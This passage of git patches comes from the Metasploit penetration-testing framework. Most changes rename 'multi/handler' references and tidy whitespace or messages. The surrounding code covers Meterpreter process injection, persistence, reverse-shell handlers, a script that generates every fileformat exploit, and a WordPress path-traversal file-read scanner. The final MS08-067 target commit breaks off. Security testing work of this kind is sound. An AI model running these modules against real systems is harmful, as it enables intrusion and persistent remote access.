@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
         an attacker is able to write arbitrary files to arbitrary locations on disk.
 
         Code execution occurs by writing to the All Users Startup Programs directory.
-        You may want to combine this module with the use of multi/handler since a
+        You may want to combine this module with the use of exploit/multi/handler since a
         user would have to log for the payload to execute.
       },
       'License'        => MSF_LICENSE,
diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
index 1d64c7ae25..e03b2907be 100644
--- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb
+++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
           If you are attempting to obtain multiple reverse shells using this module we
         recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
-        up a multi/handler to run in the background as a job to support multiple incoming
+        up a exploit/multi/handler to run in the background as a job to support multiple incoming
         shells.
 
           If you are interested in deploying payloads to spefic servers this module also
@@ -89,17 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Define master array to keep track of enumerated database information
     masterList = Array.new
-    masterList[0] = Hash.new			# Define new hash
-    masterList[0]["name"] = ""			# Name of the current database server
-    masterList[0]["db_link"] = ""		# Name of the linked database server
-    masterList[0]["db_user"] = ""	 	# User configured on the database server link
-    masterList[0]["db_sysadmin"] = ""	# Specifies if  the database user configured for the link has sysadmin privileges
-    masterList[0]["db_version"] = ""	# Database version of the linked database server
-    masterList[0]["db_os"] = ""			# OS of the linked database server
-    masterList[0]["path"] = [[]]		# Link path used during crawl - all possible link paths stored
-    masterList[0]["done"] = 0			# Used to determine if linked need to be crawled
+    masterList[0] = Hash.new            # Define new hash
+    masterList[0]["name"] = ""          # Name of the current database server
+    masterList[0]["db_link"] = ""       # Name of the linked database server
+    masterList[0]["db_user"] = ""       # User configured on the database server link
+    masterList[0]["db_sysadmin"] = ""   # Specifies if  the database user configured for the link has sysadmin privileges
+    masterList[0]["db_version"] = ""    # Database version of the linked database server
+    masterList[0]["db_os"] = ""         # OS of the linked database server
+    masterList[0]["path"] = [[]]        # Link path used during crawl - all possible link paths stored
+    masterList[0]["done"] = 0           # Used to determine if linked need to be crawled
 
-    shelled = Array.new					# keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
+    shelled = Array.new                 # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
 
     # Setup query for gathering information from database servers
     versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index 7038742da4..ab80250ffc 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
         OptInt.new('LPORT',
           [false, 'Port for Payload to connect to.', 4433]),
         OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', true])
+          [ true, 'Start an exploit/multi/handler to receive the connection', true])
       ], self.class)
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Post
     if datastore['HANDLER']
       listener_job_id = create_multihandler(lhost, lport, payload_name)
       if listener_job_id.blank?
-        print_error("Failed to start multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
+        print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.")
         return nil
       end
     end
@@ -208,7 +208,7 @@ class Metasploit3 < Msf::Post
           timer += 1
         end
       end
-      print_status('Stopping multi/handler')
+      print_status('Stopping exploit/multi/handler')
       framework.jobs.stop_job(listener_job_id)
     }
   end
@@ -238,12 +238,12 @@ class Metasploit3 < Msf::Post
     return false
   end
 
-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
   def create_multihandler(lhost, lport, payload_name)
     pay = client.framework.payloads.create(payload_name)
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
-    print_status('Starting exploit multi handler')
+    print_status('Starting exploit/multi/handler')
     if !check_for_listener(lhost, lport)
       # Set options for module
       mh = client.framework.exploits.create('multi/handler')
diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb
index 5aac76272c..299cd0a965 100644
--- a/modules/post/multi/manage/system_session.rb
+++ b/modules/post/multi/manage/system_session.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Post
         OptInt.new('LPORT',
           [false, 'Port for Payload to connect to.', 4433]),
         OptBool.new('HANDLER',
-          [ true, 'Start an Exploit Multi Handler to receive the connection', false]),
+          [ true, 'Start an exploit/multi/handler to receive the connection', false]),
         OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
           'auto', ['auto','ruby','python','perl','bash']])
       ], self.class)
@@ -111,12 +111,12 @@ class Metasploit3 < Msf::Post
     return conflict
   end
 
-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
   def create_multihand(lhost,lport)
     pay = client.framework.payloads.create("generic/shell_reverse_tcp")
     pay.datastore['LHOST'] = lhost
     pay.datastore['LPORT'] = lport
-    print_status("Starting exploit multi handler")
+    print_status("Starting exploit/multi/handler")
     if not check_for_listner(lhost,lport)
       # Set options for module
       mul = client.framework.exploits.create("multi/handler")
diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb
index 58ba395bd1..222a7b9784 100644
--- a/modules/post/windows/manage/multi_meterpreter_inject.rb
+++ b/modules/post/windows/manage/multi_meterpreter_inject.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Post
         OptInt.new('LPORT',      [false, 'Port number for the payload LPORT variable.', 4444]),
         OptString.new('IPLIST',  [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
         OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
-        OptBool.new('HANDLER',   [false, 'Start new multi/handler job on local box.', false]),
+        OptBool.new('HANDLER',   [false, 'Start new exploit/multi/handler job on local box.', false]),
         OptInt.new('AMOUNT',     [false, 'Select the amount of shells you want to spawn.', 1])
       ], self.class)
 
diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb
index 8ba2e5a8a9..10c6317646 100644
--- a/modules/post/windows/manage/payload_inject.rb
+++ b/modules/post/windows/manage/payload_inject.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
         OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
         OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
         OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
-        OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]),
+        OptBool.new('HANDLER', [ false, 'Start an exploit/multi/handler to receive the connection', false]),
         OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]),
         OptInt.new('AMOUNT',  [false, 'Select the amount of shells you want to spawn.', 1])
         ], self.class)
@@ -112,9 +112,9 @@ class Metasploit3 < Msf::Post
     return pay
   end
 
-  # Starts a multi/handler session
+  # Starts a exploit/multi/handler session
   def create_multihand(pay,pay_name,lhost,lport)
-    print_status("Starting exploit multi handler")
+    print_status("Starting exploit/multi/handler")
     if not check_for_listner(lhost,lport)
       # Set options for module
       mul = client.framework.exploits.create("multi/handler")
diff --git a/msfcli b/msfcli
index 37c1e214ac..911b32e920 100755
--- a/msfcli
+++ b/msfcli
@@ -95,7 +95,7 @@ class Msfcli
     $stdout.puts "Error: #{str}\n\n" if str
     $stdout.puts tbl.to_s + "\n"
     $stdout.puts "Examples:" + "\n"
-    $stdout.puts "msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
+    $stdout.puts "msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E" + "\n"
     $stdout.puts "msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E" + "\n"
     $stdout.puts extra + "\n" if extra
     $stdout.puts
@@ -542,7 +542,7 @@ class Msfcli
         show_payloads(modules)
       end
     when "t"
-      puts 
+      puts
       if modules[:module].file_path =~ /auxiliary\//i
         $stdout.puts("\nError: This type of module does not support targets")
       else
diff --git a/scripts/meterpreter/duplicate.rb b/scripts/meterpreter/duplicate.rb
index 89caeba6ca..080f9ded93 100644
--- a/scripts/meterpreter/duplicate.rb
+++ b/scripts/meterpreter/duplicate.rb
@@ -23,7 +23,7 @@ opts = Rex::Parser::Arguments.new(
   "-e"  => [ true,   "Executable to inject into. Default notepad.exe, will fall back to spawn if not found."],
   "-P"  => [ true,   "Process id to inject into; use instead of -e if multiple copies of one executable are running."],
   "-s"  => [ false,  "Spawn new executable to inject to.  Only useful with -P."],
-  "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"]
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"]
 )
 
 #
diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb
index 253de080f8..7eafcef435 100644
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@@ -18,7 +18,7 @@ session = client
 opts = Rex::Parser::Arguments.new(
   "-h"  => [ false,  "This help menu"],
   "-r"  => [ false,  "Uninstall an existing Meterpreter service (files must be deleted manually)"],
-  "-A"  => [ false,  "Automatically start a matching multi/handler to connect to the service"]
+  "-A"  => [ false,  "Automatically start a matching exploit/multi/handler to connect to the service"]
 )
 
 # Exec a command and return the results
@@ -117,7 +117,7 @@ if client.platform =~ /win32|win64/
   end
 
   #
-  # Setup the multi/handler if requested
+  # Setup the exploit/multi/handler if requested
   #
   if(autoconn)
     print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
diff --git a/scripts/meterpreter/multi_meter_inject.rb b/scripts/meterpreter/multi_meter_inject.rb
index 36a36e7f58..575c24f8ad 100644
--- a/scripts/meterpreter/multi_meter_inject.rb
+++ b/scripts/meterpreter/multi_meter_inject.rb
@@ -21,7 +21,7 @@ start_handler = nil
 @exec_opts = Rex::Parser::Arguments.new(
   "-h"  => [ false,  "Help menu." ],
   "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)"],
-  "-m"  => [ false,  "Start Exploit multi/handler for return connection"],
+  "-m"  => [ false,  "Start exploit/multi/handler for return connection"],
   "-pt" => [ true,   "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"],
   "-mr" => [ true,   "Provide Multiple IP Addresses for Connections separated by comma."],
   "-mp" => [ true,   "Provide Multiple PID for connections separated by comma one per IP."]
diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb
index f9edcd7f90..9cfd185d25 100644
--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -35,7 +35,7 @@ script_on_target = nil
   "-X"  => [ false,  "Automatically start the agent when the system boots"],
   "-U"  => [ false,  "Automatically start the agent when the User logs on"],
   "-S"  => [ false,  "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
-  "-A"  => [ false,  "Automatically start a matching multi/handler to connect to the agent"],
+  "-A"  => [ false,  "Automatically start a matching exploit/multi/handler to connect to the agent"],
   "-L"  => [ true,   "Location in target host to write payload to, if none \%TEMP\% will be used."],
   "-T"  => [ true,   "Alternate executable template to use"],
   "-P"  => [ true,   "Payload to use, default is windows/meterpreter/reverse_tcp."]
@@ -237,7 +237,7 @@ raw = create_payload(payload_type, rhost, rport)
 script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
 script_on_target = write_script_to_target(target_dir, script)
 
-# Start Multi/Handler
+# Start exploit/multi/handler
 if autoconn
   set_handler(payload_type, rhost, rport)
 end
diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb
index 8151145334..2ebfd24bae 100644
--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -21,7 +21,7 @@ opts = Rex::Parser::Arguments.new(
   "-v"  => [ true,   "The local port for the VNC proxy service (default: 5900)"],
   "-i"  => [ false,  "Inject the vnc server into a new process's memory instead of building an exe"],
   "-P"  => [ true,   "Executable to inject into (starts a new process).  Only useful with -i (default: notepad.exe)"],
-  "-D"  => [ false,  "Disable the automatic multi/handler (use with -r to accept on another system)"],
+  "-D"  => [ false,  "Disable the automatic exploit/multi/handler (use with -r to accept on another system)"],
   "-O"  => [ false,  "Disable binding the VNC proxy to localhost (open it to the network)"],
   "-V"  => [ false,  "Disable the automatic launch of the VNC client"],
   "-t"  => [ false,  "Tunnel through the current session connection. (Will be slower)"],
@@ -176,7 +176,7 @@ else
 end
 
 if tunnel
-  # Set up a port forward for the multi/handler to use for uploading the stage
+  # Set up a port forward for the exploit/multi/handler to use for uploading the stage
   print_status("Starting the port forwarding from #{rport} => TARGET:#{rport}")
   client.run_cmd("portfwd add -L 127.0.0.1 -l #{rport} -p #{rport} -r #{lhost}")
 end
diff --git a/scripts/resource/fileformat_generator.rc b/scripts/resource/fileformat_generator.rc
index 3e3a5657ff..96cbff3208 100644
--- a/scripts/resource/fileformat_generator.rc
+++ b/scripts/resource/fileformat_generator.rc
@@ -1,42 +1,42 @@
 <ruby>
 if (framework.datastore['WIN_PAYL'] != nil)
-	winpayl = framework.datastore['WIN_PAYL']
+    winpayl = framework.datastore['WIN_PAYL']
 else
-	# no payload defined -> we use a messagebox payload :)
-	winpayl = "windows/messagebox"
+    # no payload defined -> we use a messagebox payload :)
+    winpayl = "windows/messagebox"
 end
 
 if (framework.datastore['OSX_PAYL'] != nil)
-	osxpayl = framework.datastore['OSX_PAYL']
+    osxpayl = framework.datastore['OSX_PAYL']
 else
-	# no payload defined -> we use a generic bind payload :)
-	osxpayl = "generic/shell_bind_tcp"
+    # no payload defined -> we use a generic bind payload :)
+    osxpayl = "generic/shell_bind_tcp"
 end
 
 if (framework.datastore['MULTI_PAYL'] != nil)
-	multipayl = framework.datastore['MULTI_PAYL']
+    multipayl = framework.datastore['MULTI_PAYL']
 else
-	# no payload defined -> we use a generic bind payload :)
-	multipayl = "generic/shell_bind_tcp"
+    # no payload defined -> we use a generic bind payload :)
+    multipayl = "generic/shell_bind_tcp"
 end
 
 if (framework.datastore['LHOST'] == nil and (winpayl =~ /reverse/ or osxpayl =~ /reverse/ or multipayl =~ /reverse/))
-	print_error("please define a global LHOST Variable")
-	return
+    print_error("please define a global LHOST Variable")
+    return
 else
-	localIP = framework.datastore['LHOST']
+    localIP = framework.datastore['LHOST']
 end
 
 if (framework.datastore['VERBOSE'] == "true")
-	verbose = 1 #true
+    verbose = 1 #true
 else
-	verbose = 0
+    verbose = 0
 end
 
 if (framework.datastore['HANDLERS'] == "true")
-	handlers = 1 #true
+    handlers = 1 #true
 else
-	handlers = 0
+    handlers = 0
 end
 
 windows = false
@@ -44,66 +44,66 @@ multi = false
 osx = false
 
 framework.exploits.each do |exploit,mod|
-	if(exploit.to_s =~ /fileformat/)
-		print_line("generating fileformat exploit: #{exploit.to_s}")
-		run_single("use #{exploit}")
-		if(exploit.to_s =~ /windows/)
-			#we need this info for starting the handlers
-			windows = true
-			#setting the payload
-			run_single("set PAYLOAD #{winpayl}")
-			if(winpayl =~ /reverse/)
-				run_single("set LHOST #{localIP}")
-				run_single("set LPORT 4444")
-			end
-		elsif(exploit.to_s =~ /multi/)
-			#we need this info for starting the handlers
-			multi = true
-			#setting the payload
-			run_single("set PAYLOAD #{multipayl}")
-			if(winpayl =~ /reverse/)
-				run_single("set LHOST #{localIP}")
-				run_single("set LPORT 5555")
-			end
-		elsif(exploit.to_s =~ /osx/)
-			#we need this info for starting the handlers
-			osx = true
-			#setting the payload
-			run_single("set PAYLOAD #{osxpayl}")
-			if(osxpayl =~ /reverse/)
-				run_single("set LHOST #{localIP}")
-				run_single("set LPORT 6666")
-			end
-		end
-		extension = active_module.datastore['FILENAME'].split('.').last
-		filename = exploit.split('/').last
-		run_single("set FILENAME #{filename}.#{extension}")
-		run_single("exploit")
-		print_line
-	end
+    if(exploit.to_s =~ /fileformat/)
+        print_line("generating fileformat exploit: #{exploit.to_s}")
+        run_single("use #{exploit}")
+        if(exploit.to_s =~ /windows/)
+            #we need this info for starting the handlers
+            windows = true
+            #setting the payload
+            run_single("set PAYLOAD #{winpayl}")
+            if(winpayl =~ /reverse/)
+                run_single("set LHOST #{localIP}")
+                run_single("set LPORT 4444")
+            end
+        elsif(exploit.to_s =~ /multi/)
+            #we need this info for starting the handlers
+            multi = true
+            #setting the payload
+            run_single("set PAYLOAD #{multipayl}")
+            if(winpayl =~ /reverse/)
+                run_single("set LHOST #{localIP}")
+                run_single("set LPORT 5555")
+            end
+        elsif(exploit.to_s =~ /osx/)
+            #we need this info for starting the handlers
+            osx = true
+            #setting the payload
+            run_single("set PAYLOAD #{osxpayl}")
+            if(osxpayl =~ /reverse/)
+                run_single("set LHOST #{localIP}")
+                run_single("set LPORT 6666")
+            end
+        end
+        extension = active_module.datastore['FILENAME'].split('.').last
+        filename = exploit.split('/').last
+        run_single("set FILENAME #{filename}.#{extension}")
+        run_single("exploit")
+        print_line
+    end
 end
 
 if(handlers == 1)
-	#starting some handlers for reverse connections
-	run_single("use multi/handler")
-	if(windows == true and winpayl =~ /reverse/)
-		run_single("set PAYLOAD #{winpayl}")
-		run_single("set LHOST #{localIP}")
-		run_single("set LPORT 4444")
-		run_single("exploit -j")
-	end
-	if(multi == true and multipayl =~ /reverse/)
-		run_single("set PAYLOAD #{multipayl}")
-		run_single("set LHOST #{localIP}")
-		run_single("set LPORT 5555")
-		run_single("exploit -j")
-	end
-	if(osx == true and osxpayl =~ /reverse/)
-		run_single("set PAYLOAD #{osxpayl}")
-		run_single("set LHOST #{localIP}")
-		run_single("set LPORT 6666")
-		run_single("exploit -j")
-	end
+    #starting some handlers for reverse connections
+    run_single("use exploit/multi/handler")
+    if(windows == true and winpayl =~ /reverse/)
+        run_single("set PAYLOAD #{winpayl}")
+        run_single("set LHOST #{localIP}")
+        run_single("set LPORT 4444")
+        run_single("exploit -j")
+    end
+    if(multi == true and multipayl =~ /reverse/)
+        run_single("set PAYLOAD #{multipayl}")
+        run_single("set LHOST #{localIP}")
+        run_single("set LPORT 5555")
+        run_single("exploit -j")
+    end
+    if(osx == true and osxpayl =~ /reverse/)
+        run_single("set PAYLOAD #{osxpayl}")
+        run_single("set LHOST #{localIP}")
+        run_single("set LPORT 6666")
+        run_single("exploit -j")
+    end
 end
 run_single("back")
 </ruby>
diff --git a/spec/msfcli_spec.rb b/spec/msfcli_spec.rb
index d37908ed00..ce31679cd5 100644
--- a/spec/msfcli_spec.rb
+++ b/spec/msfcli_spec.rb
@@ -289,8 +289,8 @@ describe Msfcli, :content do
       }
     end
   end
-  
-  
+
+
   context "#guess_nop_name" do
     subject(:guess_nop_name) {
       msfcli.guess_nop_name(nop_reference_name)
@@ -555,8 +555,8 @@ describe Msfcli, :content do
         expect(modules[:module].fullname).to eq(module_name)
       end
     end
-    
-    context 'with multi/handler' do
+
+    context 'with exploit/multi/handler' do
       let(:module_name) {
         'multi/handler'
       }
@@ -571,14 +571,14 @@ describe Msfcli, :content do
         expect(modules[:module]).to be_an Msf::Exploit
         expect(modules[:module].refname).to eq(module_name)
       end
-      
+
       context 'with payload' do
         let(:args) {
           super().tap { |args|
             args.insert(-2, "payload=#{payload_reference_name}")
           }
         }
-        
+
         context 'windows/meterpreter/reverse_tcp' do
           let(:payload_reference_name) do
             'windows/meterpreter/reverse_tcp'

From 184c20cd464f55378884fd75cd0659b791069cb1 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 12 Jun 2015 15:31:42 -0500
Subject: [PATCH 0402/1013] Do minor cleanup

---
 .../scanner/http/wp_simple_backup_file_read.rb      | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
index 95fb471c7f..8c66976876 100644
--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    traversal = "../" * datastore['DEPTH']
+    traversal = '../' * datastore['DEPTH']
     filename = datastore['FILEPATH']
     filename = filename[1, filename.length] if filename =~ /^\//
 
@@ -59,11 +59,16 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     unless res && res.body
-      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way.")
+      vprint_error("#{peer} - Server did not respond in an expected way.")
       return
     end
 
-    if res.code == 200 && res.body.length > 0 && res.headers['Content-Disposition'].include?('attachment; filename')
+    if res.code == 200 &&
+        res.body.length > 0 &&
+        res.headers['Content-Disposition'] &&
+        res.headers['Content-Disposition'].include?('attachment; filename') &&
+        res.headers['Content-Length'] &&
+        res.headers['Content-Length'].to_i > 0
 
       vprint_line("#{res.body}")
       fname = datastore['FILEPATH']
@@ -78,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
 
       print_good("#{peer} - File saved in: #{path}")
     else
-      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.")
+      vprint_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.")
     end
   end
 end

From 6dcc9b7dabb80ed07c6381160bed24005475a6f1 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Fri, 12 Jun 2015 21:59:15 +0100
Subject: [PATCH 0403/1013] More inconsistencies

---
 lib/msf/core/db_manager/session.rb            |  2 +-
 lib/msf/core/exploit/http/server.rb           |  2 +-
 .../manage/multi_meterpreter_inject.rb        |  2 +-
 scripts/meterpreter/multi_meter_inject.rb     | 33 +++++++++----------
 scripts/meterpreter/persistence.rb            |  4 +--
 5 files changed, 21 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/db_manager/session.rb b/lib/msf/core/db_manager/session.rb
index dd42462dfe..fff0140739 100644
--- a/lib/msf/core/db_manager/session.rb
+++ b/lib/msf/core/db_manager/session.rb
@@ -191,7 +191,7 @@ module Msf::DBManager::Session
         via_payload: session.via_payload,
       }
 
-      # In the case of multi handler we cannot yet determine the true
+      # In the case of exploit/multi/handler we cannot yet determine the true
       # exploit responsible. But we can at least show the parent versus
       # just the generic handler:
       if session.via_exploit == "exploit/multi/handler" and sess_data[:datastore]['ParentModule']
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 15ad4722ef..a8af4d3827 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -497,7 +497,7 @@ module Exploit::Remote::HttpServer
   # bind payload but there's nothing we can do about it.
   #
   # NOTE: The address will be *incorrect* in the following two situations:
-  # 1. LHOST is pointed at a multi/handler on some other box.
+  # 1. LHOST is pointed at a exploit/multi/handler on some other box.
   # 2. SRVHOST has a value of '0.0.0.0', the user is behind NAT, and we're
   #    using a bind payload.  In that case, we don't have an LHOST and
   #    the source address will be internal.
diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb
index 222a7b9784..4900e1fc64 100644
--- a/modules/post/windows/manage/multi_meterpreter_inject.rb
+++ b/modules/post/windows/manage/multi_meterpreter_inject.rb
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Post
       'Payload'        => mul.datastore['PAYLOAD'],
       'RunAsJob'       => true
     )
-    print_good("Multi/Handler started!")
+    print_good("exploit/multi/handler started!")
   end
 
   # Function for Creating the Payload
diff --git a/scripts/meterpreter/multi_meter_inject.rb b/scripts/meterpreter/multi_meter_inject.rb
index 575c24f8ad..c167769728 100644
--- a/scripts/meterpreter/multi_meter_inject.rb
+++ b/scripts/meterpreter/multi_meter_inject.rb
@@ -20,11 +20,11 @@ payload_type = "windows/meterpreter/reverse_tcp"
 start_handler = nil
 @exec_opts = Rex::Parser::Arguments.new(
   "-h"  => [ false,  "Help menu." ],
-  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)"],
-  "-m"  => [ false,  "Start exploit/multi/handler for return connection"],
-  "-pt" => [ true,   "Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp"],
-  "-mr" => [ true,   "Provide Multiple IP Addresses for Connections separated by comma."],
-  "-mp" => [ true,   "Provide Multiple PID for connections separated by comma one per IP."]
+  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)."],
+  "-m"  => [ false,  "Start exploit/multi/handler for return connection."],
+  "-pt" => [ true,   "Specify reverse connection Meterpreter payload. Default: windows/meterpreter/reverse_tcp"],
+  "-mr" => [ true,   "Provide multiple IP addresses for connections separated by comma."],
+  "-mp" => [ true,   "Provide multiple PID for connections separated by comma one per IP."]
 )
 meter_type = client.platform
 
@@ -33,9 +33,9 @@ meter_type = client.platform
 # Usage Message Function
 #-------------------------------------------------------------------------------
 def usage
-  print_line "Meterpreter Script for injecting a reverce tcp Meterpreter Payload"
-  print_line "in to memory of multiple PIDs, if none is provided a notepad process."
-  print_line "will be created and a Meterpreter Payload will be injected in to each."
+  print_line "Meterpreter script for injecting a reverce tcp Meterpreter payload"
+  print_line "in to memory of multiple PIDs. If none is provided, a notepad process"
+  print_line "will be created and a Meterpreter payload will be injected in to each."
   print_line(@exec_opts.usage)
   raise Rex::Script::Completed
 end
@@ -43,7 +43,7 @@ end
 # Wrong Meterpreter Version Message Function
 #-------------------------------------------------------------------------------
 def wrong_meter_version(meter = meter_type)
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
+  print_error("#{meter} version of Meterpreter is not supported with this script!")
   raise Rex::Script::Completed
 end
 
@@ -62,12 +62,12 @@ def inject(target_pid, payload_to_inject)
     host_process.thread.create(mem, 0)
     print_good("Successfully injected Meterpreter in to process: #{target_pid}")
   rescue::Exception => e
-    print_error("Failed to Inject Payload to #{target_pid}!")
+    print_error("Failed to Inject payload to #{target_pid}!")
     print_error(e)
   end
 end
 
-# Function for Creation of Connection Handler
+# Function for creation of connection handler
 #-------------------------------------------------------------------------------
 def create_multi_handler(payload_to_inject)
   mul = @client.framework.exploits.create("multi/handler")
@@ -84,7 +84,7 @@ def create_multi_handler(payload_to_inject)
 
 end
 
-# Function for Creating the Payload
+# Function for creating the payload
 #-------------------------------------------------------------------------------
 def create_payload(payload_type,lhost,lport)
   print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
@@ -98,7 +98,7 @@ end
 # Function starting notepad.exe process
 #-------------------------------------------------------------------------------
 def start_proc()
-  print_good("Starting Notepad.exe to house Meterpreter Session.")
+  print_good("Starting Notepad.exe to house Meterpreter session.")
   proc = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
   print_good("Process created with pid #{proc.pid}")
   return proc.pid
@@ -121,12 +121,12 @@ end
   end
 }
 
-# Check for Version of Meterpreter
+# Check for version of Meterpreter
 wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-# Create a Multi Handler is Desired
+# Create a exploit/multi/handler if desired
 create_multi_handler(payload_type) if start_handler
 
-# Check to make sure a PID or Program name where provided
+# Check to make sure a PID or program name where provided
 
 if multi_ip
   if multi_pid
@@ -149,4 +149,3 @@ if multi_ip
 else
   print_error("You must provide at least one IP!")
 end
-
diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb
index 9cfd185d25..27939d4a94 100644
--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -138,7 +138,7 @@ def write_script_to_target(target_dir,vbs)
   return tempvbs
 end
 
-# Function for setting multi handler for autocon
+# Function for setting exploit/multi/handler for autocon
 #-------------------------------------------------------------------------------
 def set_handler(selected_payload,rhost,rport)
   print_status("Starting connection handler at port #{rport} for #{selected_payload}")
@@ -154,7 +154,7 @@ def set_handler(selected_payload,rhost,rport)
     'Payload'        => mul.datastore['PAYLOAD'],
     'RunAsJob'       => true
   )
-  print_good("Multi/Handler started!")
+  print_good("exploit/multi/handler started!")
 end
 
 # Function to execute script on target and return the PID of the process

From 9dde32f52385421c6ef13467f52fe57ba7ea790e Mon Sep 17 00:00:00 2001
From: Samuel Huckins <samuel_huckins@rapid7.com>
Date: Fri, 12 Jun 2015 16:48:54 -0500
Subject: [PATCH 0404/1013] Updating to MDM 1.2.3

MSP-12700

* Fixes issue with web_* data being loaded into memory unnecessarily
---
 Gemfile.lock | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 999bd2f902..20788623a7 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -124,7 +124,7 @@ GEM
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
     metasploit-payloads (1.0.2)
-    metasploit_data_models (1.2.2)
+    metasploit_data_models (1.2.3)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       arel-helpers

From 7f0e334d78a08e60d02dccae445eb37f74630eb7 Mon Sep 17 00:00:00 2001
From: 0xFFFFFF <omar.mezrag@gmail.com>
Date: Sat, 13 Jun 2015 13:30:02 +0100
Subject: [PATCH 0405/1013] Added Windows 2003 SP1 & SP2 French targets

msf exploit(ms08_067_netap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
